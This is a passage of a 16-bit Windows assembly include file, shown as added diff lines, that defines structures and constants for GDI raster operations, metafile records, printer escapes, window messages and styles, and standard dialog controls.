dd ? + cs_hInstance dw ? + cs_hMenu dw ? + cs_hwndParent dw ? + cs_cy dw ? + cs_cx dw ? + cs_y dw ? + cs_x dw ? + cs_style dd ? + cs_lpszName dd ? + cs_lpszClass dd ? + cs_dwExStyle dd ? +CREATESTRUCT ends +; +; PostError constants +; +WARNING = 0 ; command codes +MINOR_ERROR = 1 +FATAL_ERROR = 2 + +IGNORE = 0 ; response codes +RETRY = 1 +ABORT = 2 +; +; GDI-related constants & commands +; +ERRORREGION = 0 +NULLREGION = 1 +SIMPLEREGION = 2 +COMPLEXREGION = 3 + +IFNDEF NORASTOPS +; +; Binary raster ops +; +R2_BLACK = 1 +R2_NOTMERGEPEN = 2 +R2_MASKNOTPEN = 3 +R2_NOTCOPYPEN = 4 +R2_MASKPENNOT = 5 +R2_NOT = 6 +R2_XORPEN = 7 +R2_NOTMASKPEN = 8 +R2_MASKPEN = 9 +R2_NOTXORPEN = 10 +R2_NOP = 11 +R2_MERGENOTPEN = 12 +R2_COPYPEN = 13 +R2_MERGEPENNOT = 14 +R2_MERGEPEN = 15 +R2_WHITE = 16 +; +; Ternary raster ops +; +SRCCOPY_L = 0020h ;dest=source +SRCCOPY_H = 00CCh +SRCPAINT_L = 0086h ;dest=source OR dest +SRCPAINT_H = 00EEh +SRCAND_L = 00C6h ;dest=source AND dest +SRCAND_H = 0088h +SRCINVERT_L = 0046h ;dest= source XOR dest +SRCINVERT_H = 0066h +SRCERASE_L = 0328h ;dest= source AND (not dest ) +SRCERASE_H = 0044h +NOTSRCCOPY_L = 0008h ;dest= (not source) +NOTSRCCOPY_H = 0033h +NOTSRCERASE_L = 00A6h ;dest= (not source) AND (not dest) +NOTSRCERASE_H = 0011h +MERGECOPY_L = 00CAh ;dest= (source AND pattern) +MERGECOPY_H = 00C0h +MERGEPAINT_L = 0226h ;dest= (source AND pattern) OR dest +MERGEPAINT_H = 00BBh +PATCOPY_L = 0021h ;dest= pattern +PATCOPY_H = 00F0h +PATPAINT_L = 0A09h ;DPSnoo +PATPAINT_H = 00FBh +PATINVERT_L = 0049h ;dest= pattern XOR dest +PATINVERT_H = 005Ah +DSTINVERT_L = 0009h ;dest= (not dest) +DSTINVERT_H = 0055h +BLACKNESS_L = 0042h ;dest= BLACK +BLACKNESS_H = 0000h +WHITENESS_L = 0062h ;dest= WHITE +WHITENESS_H = 00FFh +; +; StretchBlt modes +; +BLACKONWHITE = 1 +WHITEONBLACK = 2 +COLORONCOLOR = 3 +; +; New StretchBlt modes +; +STRETCH_ANDSCANS = 1 +STRETCH_ORSCANS = 2 +STRETCH_DELETESCANS = 3 +; +; PolyFill modes +; +ALTERNATE = 1 +WINDING = 2 +ENDIF +; +; Text Alignment Options +; +TA_NOUPDATECP = 0 +TA_UPDATECP = 1 + +TA_LEFT = 0 +TA_RIGHT = 2 +TA_CENTER = 6 + +TA_TOP = 0 +TA_BOTTOM = 8 +TA_BASELINE = 24 + +ETO_GRAYED = 1 +ETO_OPAQUE = 2 +ETO_CLIPPED = 4 + +ASPECT_FILTERING = 1 + +ifndef NOMETAFILE + +; Metafile Functions */ +META_SETBKCOLOR = 0201h +META_SETBKMODE = 0102h +META_SETMAPMODE = 0103h +META_SETROP2 = 0104h +META_SETRELABS = 0105h +META_SETPOLYFILLMODE = 0106h +META_SETSTRETCHBLTMODE = 0107h +META_SETTEXTCHAREXTRA = 0108h +META_SETTEXTCOLOR = 0209h +META_SETTEXTJUSTIFICATION = 020Ah +META_SETWINDOWORG = 020Bh +META_SETWINDOWEXT = 020Ch +META_SETVIEWPORTORG = 020Dh +META_SETVIEWPORTEXT = 020Eh +META_OFFSETWINDOWORG = 020Fh +META_SCALEWINDOWEXT = 0400h +META_OFFSETVIEWPORTORG = 0211h +META_SCALEVIEWPORTEXT = 0412h +META_LINETO = 0213h +META_MOVETO = 0214h +META_EXCLUDECLIPRECT = 0415h +META_INTERSECTCLIPRECT = 0416h +META_ARC = 0817h +META_ELLIPSE = 0418h +META_FLOODFILL = 0419h +META_PIE = 081Ah +META_RECTANGLE = 041Bh +META_ROUNDRECT = 061Ch +META_PATBLT = 061Dh +META_SAVEDC = 001Eh +META_SETPIXEL = 041Fh +META_OFFSETCLIPRGN = 0220h +META_TEXTOUT = 0521h +META_BITBLT = 0922h +META_STRETCHBLT = 0B23h +META_POLYGON = 0324h +META_POLYLINE = 0325h +META_ESCAPE = 0626h +META_RESTOREDC = 0127h +META_FILLREGION = 0228h +META_FRAMEREGION = 0429h +META_INVERTREGION = 012Ah +META_PAINTREGION = 012Bh +META_SELECTCLIPREGION = 012Ch +META_SELECTOBJECT = 012Dh +META_SETTEXTALIGN = 012Eh +META_DRAWTEXT = 062Fh + +META_CHORD = 0830h +META_SETMAPPERFLAGS = 0231h +META_EXTTEXTOUT = 0a32h +META_SETDIBTODEV = 0d33h +META_SELECTPALETTE = 0234h +META_REALIZEPALETTE = 0035h +META_ANIMATEPALETTE = 0436h +META_SETPALENTRIES = 0037h +META_POLYPOLYGON = 0538h +META_RESIZEPALETTE = 0139h + +META_DIBBITBLT = 0940h +META_DIBSTRETCHBLT = 0b41h +META_DIBCREATEPATTERNBRUSH = 0142h +META_STRETCHDIB = 0f43h + +META_DELETEOBJECT = 01f0h + +META_CREATEPALETTE = 00f7h +META_CREATEBRUSH = 00F8h +META_CREATEPATTERNBRUSH = 01F9h +META_CREATEPENINDIRECT = 02FAh +META_CREATEFONTINDIRECT = 02FBh +META_CREATEBRUSHINDIRECT = 02FCh +META_CREATEBITMAPINDIRECT = 02FDh +META_CREATEBITMAP = 06FEh +META_CREATEREGION = 06FFh + +; /* Clipboard Metafile Picture Structure */ +HANDLETABLE struc + ht_objectHandle dw ? +HANDLETABLE ends + +METARECORD struc + mr_rdSize dd ? + mr_rdFunction dw ? + mr_rdParm dw ? +METARECORD ends + +METAFILEPICT struc + mfp_mm dw ? + mfp_xExt dw ? + mfp_yExt dw ? + mfp_hMF dw ? +METAFILEPICT ends + +METAHEADER struc + mtType dw ? + mtHeaderSize dw ? + mtVersion dw ? + mtSize dd ? + mtNoObjects dw ? + mtMaxRecord dd ? + mtNoParameters dw ? +METAHEADER ends + +endif ; NOMETAFILE + +; GDI Escapes +NEWFRAME = 1 +ABORTDOC = 2 +NEXTBAND = 3 +SETCOLORTABLE = 4 +GETCOLORTABLE = 5 +FLUSHOUTPUT = 6 +DRAFTMODE = 7 +QUERYESCSUPPORT = 8 +SETABORTPROC = 9 +STARTDOC = 10 +;; This value conflicts with a std WIN386 MACRO definition +;;ENDDOC = 11 +GETPHYSPAGESIZE = 12 +GETPRINTINGOFFSET = 13 +GETSCALINGFACTOR = 14 +MFCOMMENT = 15 +GETPENWIDTH = 16 +SETCOPYCOUNT = 17 +SELECTPAPERSOURCE = 18 +DEVICEDATA = 19 +PASSTHROUGH = 19 +GETTECHNOLGY = 20 +GETTECHNOLOGY = 20 +SETENDCAP = 21 +SETLINEJOIN = 22 +SETMITERLIMIT = 23 +BANDINFO = 24 +DRAWPATTERNRECT = 25 +GETVECTORPENSIZE = 26 +GETVECTORBRUSHSIZE = 27 +ENABLEDUPLEX = 28 +ENABLEMANUALFEED = 29 +GETSETPAPERBINS = 29 +GETSETPRINTORIENT = 30 +ENUMPAPERBINS = 31 + +GETEXTENDEDTEXTMETRICS = 256 +GETEXTENTTABLE = 257 +GETPAIRKERNTABLE = 258 +GETTRACKKERNTABLE = 259 + +EXTTEXTOUT = 512 + +ENABLERELATIVEWIDTHS = 768 +ENABLEPAIRKERNING = 769 +SETKERNTRACK = 770 +SETALLJUSTVALUES = 771 +SETCHARSET = 772 + +GETSETSCREENPARAMS = 3072 + +STRETCHBLT = 2048 + + +; Spooler Error Codes +SP_NOTREPORTED = 4000h +SP_ERROR = (-1) +SP_APPABORT = (-2) +SP_USERABORT = (-3) +SP_OUTOFDISK = (-4) +SP_OUTOFMEMORY = (-5) + +PR_JOBSTATUS = 0000 + +; Object Definitions for EnumObjects() +OBJ_PEN = 1 +OBJ_BRUSH = 2 + +; +; Menu flags for Change/Check/Enable MenuItem +; +MF_INSERT = 0000h +MF_CHANGE = 0080h +MF_APPEND = 0100h +MF_DELETE = 0200h +MF_REMOVE = 1000h + +MF_BYCOMMAND = 0000h +MF_BYPOSITION = 0400h + +MF_SEPARATOR = 0800h + +MF_ENABLED = 0000h +MF_GRAYED = 0001h +MF_DISABLED = 0002h + +MF_UNCHECKED = 0000h +MF_CHECKED = 0008h +MF_USECHECKBITMAPS= 0200h + +MF_STRING = 0000h +MF_BITMAP = 0004h +MF_OWNERDRAW = 0100h + +MF_POPUP = 0010h +MF_MENUBARBREAK = 0020h +MF_MENUBREAK = 0040h + +MF_UNHILITE = 0000h +MF_HILITE = 0080h + +MF_SYSMENU = 2000h +MF_HELP = 4000h +MF_MOUSESELECT = 8000h + + +; +; System Menu Command Values +; +SC_SIZE = 0F000h +SC_MOVE = 0F010h +SC_MINIMIZE = 0F020h +SC_MAXIMIZE = 0F030h +SC_NEXTWINDOW = 0F040h +SC_PREVWINDOW = 0F050h +SC_CLOSE = 0F060h +SC_VSCROLL = 0F070h +SC_HSCROLL = 0F080h +SC_MOUSEMENU = 0F090h +SC_KEYMENU = 0F100h +SC_ARRANGE = 0F110h +SC_RESTORE = 0F120h +SC_TASKLIST = 0F130h +SC_SCREENSAVE = 0F140h +SC_HOTKEY = 0F150h + +SC_ICON = SC_MINIMIZE +SC_ZOOM = SC_MAXIMIZE + +; +; Window State Messages +; +IFNDEF NOWM +WM_STATE = 0000H + +WM_NULL = 0000h +WM_CREATE = 0001h +WM_DESTROY = 0002h +WM_MOVE = 0003h +WM_SIZE = 0005h +WM_ACTIVATE = 0006h +WM_SETFOCUS = 0007h +WM_KILLFOCUS = 0008h +WM_ENABLE = 000Ah +WM_SETREDRAW = 000Bh +WM_SETTEXT = 000Ch +WM_GETTEXT = 000Dh +WM_GETTEXTLENGTH = 000Eh +WM_PAINT = 000Fh +WM_CLOSE = 0010h +WM_QUERYENDSESSION = 0011h +WM_QUIT = 0012h +WM_QUERYOPEN = 0013h +WM_ERASEBKGND = 0014h +WM_SYSCOLORCHANGE = 0015h +WM_ENDSESSION = 0016h +WM_SYSTEMERROR = 0017h +WM_SHOWWINDOW = 0018h +WM_CTLCOLOR = 0019h +WM_WININICHANGE = 001Ah +WM_DEVMODECHANGE = 001Bh +WM_ACTIVATEAPP = 001Ch +WM_FONTCHANGE = 001Dh +WM_TIMECHANGE = 001Eh +WM_CANCELMODE = 001Fh +WM_SETCURSOR = 0020h +WM_MOUSEACTIVATE = 0021h +WM_CHILDACTIVATE = 0022h +WM_QUEUESYNC = 0023h +WM_GETMINMAXINFO = 0024h +WM_PAINTICON = 0026h +WM_ICONERASEBKGND = 0027h +WM_NEXTDLGCTL = 0028h +WM_SPOOLERSTATUS = 002Ah +WM_DRAWITEM = 002Bh +WM_MEASUREITEM = 002Ch +WM_DELETEITEM = 002Dh +WM_VKEYTOITEM = 002Eh +WM_CHARTOITEM = 002Fh +WM_SETFONT = 0030h +WM_GETFONT = 0031h +WM_QUERYDRAGICON = 0037h +WM_COMPAREITEM = 0039h +WM_COMPACTING = 0041h +IFNDEF NOWIN31 +WM_COMMNOTIFY = 0044h +WM_WINDOWPOSCHANGING= 0046h +WM_WINDOWPOSCHANGED = 0047h +WM_POWER = 0048h +ENDIF + + +WM_NCCREATE = 0081h +WM_NCDESTROY = 0082h +WM_NCCALCSIZE = 0083h +WM_NCHITTEST = 0084h +WM_NCPAINT = 0085h +WM_NCACTIVATE = 0086h +WM_GETDLGCODE = 0087h +WM_NCMOUSEMOVE = 00A0h +WM_NCLBUTTONDOWN = 00A1h +WM_NCLBUTTONUP = 00A2h +WM_NCLBUTTONDBLCLK = 00A3h +WM_NCRBUTTONDOWN = 00A4h +WM_NCRBUTTONUP = 00A5h +WM_NCRBUTTONDBLCLK = 00A6h +WM_NCMBUTTONDOWN = 00A7h +WM_NCMBUTTONUP = 00A8h +WM_NCMBUTTONDBLCLK = 00A9h + +WM_KEYFIRST = 0100h +WM_KEYDOWN = 0100h +WM_KEYUP = 0101h +WM_CHAR = 0102h +WM_DEADCHAR = 0103h +WM_SYSKEYDOWN = 0104h +WM_SYSKEYUP = 0105h +WM_SYSCHAR = 0106h +WM_SYSDEADCHAR = 0107h +WM_KEYLAST = 0108h + +WM_INITDIALOG = 0110h +WM_COMMAND = 0111h +WM_SYSCOMMAND = 0112h +WM_TIMER = 0113h +WM_HSCROLL = 0114h +WM_VSCROLL = 0115h +WM_INITMENU = 0116h +WM_INITMENUPOPUP = 0117h +WM_MENUSELECT = 011Fh +WM_MENUCHAR = 0120h +WM_ENTERIDLE = 0121h + + +WM_MOUSEFIRST = 0200h +WM_MOUSEMOVE = 0200h +WM_LBUTTONDOWN = 0201h +WM_LBUTTONUP = 0202h +WM_LBUTTONDBLCLK = 0203h +WM_RBUTTONDOWN = 0204h +WM_RBUTTONUP = 0205h +WM_RBUTTONDBLCLK = 0206h +WM_MBUTTONDOWN = 0207h +WM_MBUTTONUP = 0208h +WM_MBUTTONDBLCLK = 0209h +WM_MOUSELAST = 0209h + +WM_PARENTNOTIFY = 0210h +WM_MDICREATE = 0220h +WM_MDIDESTROY = 0221h +WM_MDIACTIVATE = 0222h +WM_MDIRESTORE = 0223h +WM_MDINEXT = 0224h +WM_MDIMAXIMIZE = 0225h +WM_MDITILE = 0226h +WM_MDICASCADE = 0227h +WM_MDIICONARRANGE = 0228h +WM_MDIGETACTIVE = 0229h +WM_MDISETMENU = 0230h +WM_DROPFILES = 0233h + + +WM_CUT = 0300h +WM_COPY = 0301h +WM_PASTE = 0302h +WM_CLEAR = 0303h +WM_UNDO = 0304h +WM_RENDERFORMAT = 0305h +WM_RENDERALLFORMATS = 0306h +WM_DESTROYCLIPBOARD = 0307h +WM_DRAWCLIPBOARD = 0308h +WM_PAINTCLIPBOARD = 0309h +WM_VSCROLLCLIPBOARD = 030Ah +WM_SIZECLIPBOARD = 030Bh +WM_ASKCBFORMATNAME = 030Ch +WM_CHANGECBCHAIN = 030Dh +WM_HSCROLLCLIPBOARD = 030Eh +WM_QUERYNEWPALETTE = 030Fh +WM_PALETTEISCHANGING = 0310h +WM_PALETTECHANGED = 0311h + +IFNDEF NOWIN31 +WM_PENWINFIRST equ 0380h +WM_PENWINLAST equ 038Fh + + +WM_COALESCE_FIRST equ 0390h +WM_COALESCE_LAST equ 039Fh + + + + +ENDIF + + + +; private window messages start here +WM_USER = 0400H +ENDIF ; NOWM + +; WM_MOUSEACTIVATE Return Codes +MA_ACTIVATE = 1 +MA_ACTIVATEANDEAT = 2 +MA_NOACTIVATE = 3 + +; Size message commands +SIZENORMAL = 0 +SIZEICONIC = 1 +SIZEFULLSCREEN = 2 +SIZEZOOMSHOW = 3 +SIZEZOOMHIDE = 4 + +; ShowWindow() Commands +SW_HIDE = 0 +SW_SHOWNORMAL = 1 +SW_NORMAL = 1 +SW_SHOWMINIMIZED = 2 +SW_SHOWMAXIMIZED = 3 +SW_MAXIMIZE = 3 +SW_SHOWNOACTIVATE = 4 +SW_SHOW = 5 +SW_MINIMIZE = 6 +SW_SHOWMINNOACTIVE = 7 +SW_SHOWNA = 8 +SW_RESTORE = 9 + +; Old ShowWindow() Commands +HIDE_WINDOW = 0 +SHOW_OPENWINDOW = 1 +SHOW_ICONWINDOW = 2 +SHOW_FULLSCREEN = 3 +SHOW_OPENNOACTIVATE= 4 + +; identifiers for the WM_SHOWWINDOW message +SW_PARENTCLOSING = 1 +SW_OTHERZOOM = 2 +SW_PARENTOPENING = 3 +SW_OTHERUNZOOM = 4 +; +; Key state masks for mouse messages +; +MK_LBUTTON = 0001h +MK_RBUTTON = 0002h +MK_SHIFT = 0004h +MK_CONTROL = 0008h +MK_MBUTTON = 0010h +; +; Class styles +; +CS_VREDRAW = 0001h +CS_HREDRAW = 0002h +CS_KEYCVTWINDOW = 0004H +CS_DBLCLKS = 0008h +; 0010h reserved +CS_OWNDC = 0020h +CS_CLASSDC = 0040h +CS_PARENTDC = 0080h +CS_NOKEYCVT = 0100h +CS_SAVEBITS = 0800h +CS_NOCLOSE = 0200h +CS_BYTEALIGNCLIENT = 1000h +CS_BYTEALIGNWINDOW = 2000h +CS_GLOBALCLASS = 4000h ; Global window class + +; +; Special CreateWindow position value +; +CW_USEDEFAULT EQU 8000h + +; +; Windows styles (the high words) +; +WS_OVERLAPPED = 00000h +WS_ICONICPOPUP = 0C000h +WS_POPUP = 08000h +WS_CHILD = 04000h +WS_MINIMIZE = 02000h +WS_VISIBLE = 01000h +WS_DISABLED = 00800h +WS_CLIPSIBLINGS = 00400h +WS_CLIPCHILDREN = 00200h +WS_MAXIMIZE = 00100h +WS_CAPTION = 000C0h ; WS_BORDER | WS_DLGFRAME +WS_BORDER = 00080h +WS_DLGFRAME = 00040h +WS_VSCROLL = 00020h +WS_HSCROLL = 00010h +WS_SYSMENU = 00008h +WS_THICKFRAME = 00004h +WS_HREDRAW = 00002h +WS_VREDRAW = 00001h +WS_GROUP = 00002h +WS_TABSTOP = 00001h +WS_MINIMIZEBOX = 00002h +WS_MAXIMIZEBOX = 00001h + +; Common Window Styles + +WS_OVERLAPPEDWINDOW = WS_OVERLAPPED + WS_CAPTION + WS_SYSMENU + WS_THICKFRAME + WS_MINIMIZEBOX + WS_MAXIMIZEBOX +WS_POPUPWINDOW = WS_POPUP + WS_BORDER + WS_SYSMENU +WS_CHILDWINDOW = WS_CHILD +WS_TILEDWINDOW = WS_OVERLAPPEDWINDOW + +WS_TILED = WS_OVERLAPPED +WS_ICONIC = WS_MINIMIZE +WS_SIZEBOX = WS_THICKFRAME + +; Extended Window Styles (low words) +WS_EX_DLGMODALFRAME = 0001 +WS_EX_DRAGOBJECT = 0002 +WS_EX_NOPARENTNOTIFY = 0004 +WS_EX_TOPMOST = 0008 + +; +; predefined clipboard formats +; +CF_TEXT = 1 +CF_BITMAP = 2 +CF_METAFILEPICT = 3 +CF_SYLK = 4 +CF_DIF = 5 +CF_TIFF = 6 +CF_OEMTEXT = 7 +CF_DIB = 8 +CF_PALETTE = 9 +CF_PENDATA = 10 +CF_RIFF = 11 +CF_WAVE = 12 + +CF_OWNERDISPLAY = 80h ; owner display +CF_DSPTEXT = 81h ; display text +CF_DSPBITMAP = 82h ; display bitmap +CF_DSPMETAFILEPICT = 83h ; display metafile +; +; Private clipboard format range +; +CF_PRIVATEFIRST = 200h ; Anything in this range doesn't +CF_PRIVATELAST = 2ffh ; get GlobalFree'd +CF_GDIOBJFIRST = 300h ; Anything in this range gets +CF_GDIOBJLAST = 3ffh ; DeleteObject'ed + + +MAKEINTRESOURCE MACRO a + mov ax,a + xor dx,dx + ENDM +; +; Predefined resource types +; +RT_CURSOR = 1 ; must be passed through MAKEINTRESOURCE +RT_BITMAP = 2 +RT_ICON = 3 +RT_MENU = 4 +RT_DIALOG = 5 +RT_STRING = 6 +RT_FONTDIR = 7 +RT_FONT = 8 +RT_ACCELERATOR = 9 +RT_RCDATA = 10 + +;** NOTE: if any new resource types are introduced above this point, then the +;** value of DIFFERENCE must be changed. +;** (RT_GROUP_CURSOR - RT_CURSOR) must always be equal to DIFFERENCE +;** (RT_GROUP_ICON - RT_ICON) must always be equal to DIFFERENCE + +DIFFERENCE = 11 + +RT_GROUP_CURSOR = RT_CURSOR + DIFFERENCE +RT_GROUP_ICON = RT_ICON + DIFFERENCE + + + +IFNDEF NOMDI +MDICREATESTRUCT struc + szClass dd ? + szTitle dd ? + hOwner dw ? + x dw ? + y dw ? + cxc dw ? + cyc dw ? + style dd ? +MDICREATESTRUCT ends + +CLIENTCREATESTRUCT struc + hWindowMenu dw ? + idFirstChild dw ? +CLIENTCREATESTRUCT ends +ENDIF + +; NOMDI + + +PALETTEENTRY struc + peRed db ? + peGreen db ? + peBlue db ? + peFlags db ? +PALETTEENTRY ends + +; Logical Palette +LOGPALETTE struc + palVersion dw ? + palNumEntries dw ? + palPalEntry db ? ; array of PALETTEENTRY +LOGPALETTE ends + +; DRAWITEMSTRUCT for ownerdraw +DRAWITEMSTRUCT struc + drCtlType dw ? + drCtlID dw ? + dritemID dw ? + dritemAction dw ? + dritemState dw ? + drhwndItem dw ? + drhDC dw ? + drrcItem DB size RECT dup(?) + dritemData dd ? +DRAWITEMSTRUCT ends + +; DELETEITEMSTRUCT for ownerdraw +DELETEITEMSTRUCT struc + deCtlType dw ? + deCtlID dw ? + deitemID dw ? + dehwndItem dw ? + deitemData dd ? +DELETEITEMSTRUCT ends + +; MEASUREITEMSTRUCT for ownerdraw +MEASUREITEMSTRUCT struc + meCtlType dw ? + meCtlID dw ? + meitemID dw ? + meitemWidth dw ? + meitemHeight dw ? + meitemData dd ? +MEASUREITEMSTRUCT ends + +; COMPAREITEMSTUCT for ownerdraw sorting +COMPAREITEMSTRUCT struc + coCtlType dw ? + coCtlID dw ? + cohwndItem dw ? + coitemID1 dw ? + coitemData1 dd ? + coitemID2 dw ? + coitemData2 dd ? +COMPAREITEMSTRUCT ends + +; Owner draw control types +ODT_MENU = 1 +ODT_LISTBOX = 2 +ODT_COMBOBOX = 3 +ODT_BUTTON = 4 + +; Owner draw actions +ODA_DRAWENTIRE = 1 +ODA_SELECT = 2 +ODA_FOCUS = 4 + +; Owner draw state +ODS_SELECTED = 0001h +ODS_GRAYED = 0002h +ODS_DISABLED = 0004h +ODS_CHECKED = 0008h +ODS_FOCUS = 0010h + +; PeekMessage() Options +PM_NOREMOVE = 0000h +PM_REMOVE = 0001h +PM_NOYIELD = 0002h + +; SetWindowPos Flags +SWP_NOSIZE = 0001h +SWP_NOMOVE = 0002h +SWP_NOZORDER = 0004h +SWP_NOREDRAW = 0008h +SWP_NOACTIVATE = 0010h +SWP_DRAWFRAME = 0020h +SWP_SHOWWINDOW = 0040h +SWP_HIDEWINDOW = 0080h +SWP_NOCOPYBITS = 0100h +SWP_NOREPOSITION = 0200h + + +IFNDEF NOWINMESSAGES + +; Listbox messages +LB_ADDSTRING = (WM_USER+1) +LB_INSERTSTRING = (WM_USER+2) +LB_DELETESTRING = (WM_USER+3) +LB_RESETCONTENT = (WM_USER+5) +LB_SETSEL = (WM_USER+6) +LB_SETCURSEL = (WM_USER+7) +LB_GETSEL = (WM_USER+8) +LB_GETCURSEL = (WM_USER+9) +LB_GETTEXT = (WM_USER+10) +LB_GETTEXTLEN = (WM_USER+11) +LB_GETCOUNT = (WM_USER+12) +LB_SELECTSTRING = (WM_USER+13) +LB_DIR = (WM_USER+14) +LB_GETTOPINDEX = (WM_USER+15) +LB_FINDSTRING = (WM_USER+16) +LB_GETSELCOUNT = (WM_USER+17) +LB_GETSELITEMS = (WM_USER+18) +LB_SETTABSTOPS = (WM_USER+19) +LB_GETHORIZONTALEXTENT = (WM_USER+20) +LB_SETHORIZONTALEXTENT = (WM_USER+21) +LB_SETTOPINDEX = (WM_USER+24) +LB_GETITEMRECT = (WM_USER+25) +LB_GETITEMDATA = (WM_USER+26) +LB_SETITEMDATA = (WM_USER+27) +LB_SELITEMRANGE = (WM_USER+28) +LB_SETCARETINDEX = (WM_USER+31) +LB_GETCARETINDEX = (WM_USER+32) +IFNDEF NOWIN31 +LB_SETITEMHEIGHT = (WM_USER+33) +LB_GETITEMHEIGHT = (WM_USER+34) +LB_FINDSTRINGEXACT = (WM_USER+35) +ENDIF + +ENDIF +; NOWINMESSAGES + +; Listbox Styles +LBS_NOTIFY = 0001h +LBS_SORT = 0002h +LBS_NOREDRAW = 0004h +LBS_MULTIPLESEL = 0008h +LBS_OWNERDRAWFIXED = 0010h +LBS_OWNERDRAWVARIABLE = 0020h +LBS_HASSTRINGS = 0040h +LBS_USETABSTOPS = 0080h +LBS_NOINTEGRALHEIGHT = 0100h +LBS_MULTICOLUMN = 0200h +LBS_WANTKEYBOARDINPUT = 0400h +LBS_EXTENDEDSEL = 0800h +LBS_STANDARD = LBS_NOTIFY + LBS_SORT + WS_VSCROLL + WS_BORDER +LBS_DISABLENOSCROLL = 1000h + +; Listbox Notification Codes +LBN_ERRSPACE = (-2) +LBN_SELCHANGE = 1 +LBN_DBLCLK = 2 +LBN_SELCANCEL = 3 +LBN_SETFOCUS = 4 +LBN_KILLFOCUS = 5 + +IFNDEF NOWINMESSAGES + +; Edit Control Messages +EM_GETSEL = (WM_USER+0) +EM_SETSEL = (WM_USER+1) +EM_GETRECT = (WM_USER+2) +EM_SETRECT = (WM_USER+3) +EM_SETRECTNP = (WM_USER+4) +EM_SCROLL = (WM_USER+5) +EM_LINESCROLL = (WM_USER+6) +EM_GETMODIFY = (WM_USER+8) +EM_SETMODIFY = (WM_USER+9) +EM_GETLINECOUNT = (WM_USER+10) +EM_LINEINDEX = (WM_USER+11) +EM_SETHANDLE = (WM_USER+12) +EM_GETHANDLE = (WM_USER+13) +EM_LINELENGTH = (WM_USER+17) +EM_REPLACESEL = (WM_USER+18) +EM_SETFONT = (WM_USER+19) +EM_GETLINE = (WM_USER+20) +EM_LIMITTEXT = (WM_USER+21) +EM_CANUNDO = (WM_USER+22) +EM_UNDO = (WM_USER+23) +EM_FMTLINES = (WM_USER+24) +EM_LINEFROMCHAR = (WM_USER+25) +EM_SETWORDBREAK = (WM_USER+26) +EM_SETTABSTOPS = (WM_USER+27) +EM_SETPASSWORDCHAR = (WM_USER+28) +EM_EMPTYUNDOBUFFER = (WM_USER+29) +IFNDEF NOWIN31 +EM_GETFIRSTVISIBLELINE = (WM_USER+30) +EM_SETREADONLY = (WM_USER+31) +EM_SETWORDBREAKPROC = (WM_USER+32) +EM_GETWORDBREAKPROC = (WM_USER+33) +EM_GETPASSWORDCHAR = (WM_USER+34) +ENDIF + +ENDIF +; NOWINMESSAGES + + +; Edit Control Styles (low word) +ES_LEFT = 0000h +ES_CENTER = 0001h +ES_RIGHT = 0002h +ES_MULTILINE = 0004h +ES_UPPERCASE = 0008h +ES_LOWERCASE = 0010h +ES_PASSWORD = 0020h +ES_AUTOVSCROLL = 0040h +ES_AUTOHSCROLL = 0080h +ES_NOHIDESEL = 0100h +ES_OEMCONVERT = 0400h +IFNDEF NOWIN31 +ES_READONLY = 0800h +ES_WANTRETURN = 1000h +ENDIF + + +; Edit Control Notification Codes +EN_SETFOCUS = 0100h +EN_KILLFOCUS = 0200h +EN_CHANGE = 0300h +EN_UPDATE = 0400h +EN_ERRSPACE = 0500h +EN_MAXTEXT = 0501h +EN_HSCROLL = 0601h +EN_VSCROLL = 0602h + +IFNDEF NOWINMESSAGES + +; Button Control Messages +BM_GETCHECK = (WM_USER+0) +BM_SETCHECK = (WM_USER+1) +BM_GETSTATE = (WM_USER+2) +BM_SETSTATE = (WM_USER+3) +BM_SETSTYLE = (WM_USER+4) + +ENDIF +; NOWINMESSAGES + +; Button Control Styles (low word) +BS_PUSHBUTTON = 00h +BS_DEFPUSHBUTTON = 01h +BS_CHECKBOX = 02h +BS_AUTOCHECKBOX = 03h +BS_RADIOBUTTON = 04h +BS_3STATE = 05h +BS_AUTO3STATE = 06h +BS_GROUPBOX = 07h +BS_USERBUTTON = 08h +BS_AUTORADIOBUTTON = 09h +BS_OWNERDRAW = 0Bh +BS_LEFTTEXT = 20h + +; User Button Notification Codes +BN_CLICKED = 0 +BN_PAINT = 1 +BN_HILITE = 2 +BN_UNHILITE = 3 +BN_DISABLE = 4 +BN_DOUBLECLICKED = 5 + +; Dialog Styles (low words) +DS_ABSALIGN = 01h +DS_SYSMODAL = 02h +DS_LOCALEDIT = 20h ;/* Edit items get Local storage. */ +DS_SETFONT = 40h ;/* User specified font for Dlg controls */ +DS_MODALFRAME = 80h ;/* Can be combined with WS_CAPTION */ +DS_NOIDLEMSG = 100h ;/* WM_ENTERIDLE message will not be sent */ + +IFNDEF NOWINMESSAGES + +; Dialog box messages +DM_GETDEFID = (WM_USER+0) +DM_SETDEFID = (WM_USER+1) + +ENDIF ;NOWINMESSAGES + +; Dialog Codes +DLGC_WANTARROWS = 0001h ; /* Control wants arrow keys */ +DLGC_WANTTAB = 0002h ; /* Control wants tab keys */ +DLGC_WANTALLKEYS = 0004h ; /* Control wants all keys */ +DLGC_WANTMESSAGE = 0004h ; /* Pass message to control */ +DLGC_HASSETSEL = 0008h ; /* Understands EM_SETSEL message */ +DLGC_DEFPUSHBUTTON = 0010h ; /* Default pushbutton */ +DLGC_UNDEFPUSHBUTTON= 0020h ; /* Non-default pushbutton */ +DLGC_RADIOBUTTON = 0040h ; /* Radio button */ +DLGC_WANTCHARS = 0080h ; /* Want WM_CHAR messages */ +DLGC_STATIC = 0100h ; /* Static item: don't include */ +DLGC_BUTTON = 2000h ; /* Button item: can be checked */ + +; Combo Box return Values +CB_OKAY = 0 +CB_ERR = (-1) +CB_ERRSPACE = (-2) + +; Combo Box Notification Codes +CBN_ERRSPACE = (-1) +CBN_SELCHANGE = 1 +CBN_DBLCLK = 2 +CBN_SETFOCUS = 3 +CBN_KILLFOCUS = 4 +CBN_EDITCHANGE = 5 +CBN_EDITUPDATE = 6 +CBN_DROPDOWN = 7 + +; Combo Box styles (low words) +CBS_SIMPLE = 0001h +CBS_DROPDOWN = 0002h +CBS_DROPDOWNLIST = 0003h +CBS_OWNERDRAWFIXED = 0010h +CBS_OWNERDRAWVARIABLE= 0020h +CBS_AUTOHSCROLL = 0040h +CBS_OEMCONVERT = 0080h +CBS_SORT = 0100h +CBS_HASSTRINGS = 0200h +CBS_NOINTEGRALHEIGHT = 0400h + +IFNDEF NOWINMESSAGES + +; Combo Box messages +CB_GETEDITSEL = (WM_USER+0) +CB_LIMITTEXT = (WM_USER+1) +CB_SETEDITSEL = (WM_USER+2) +CB_ADDSTRING = (WM_USER+3) +CB_DELETESTRING = (WM_USER+4) +CB_DIR = (WM_USER+5) +CB_GETCOUNT = 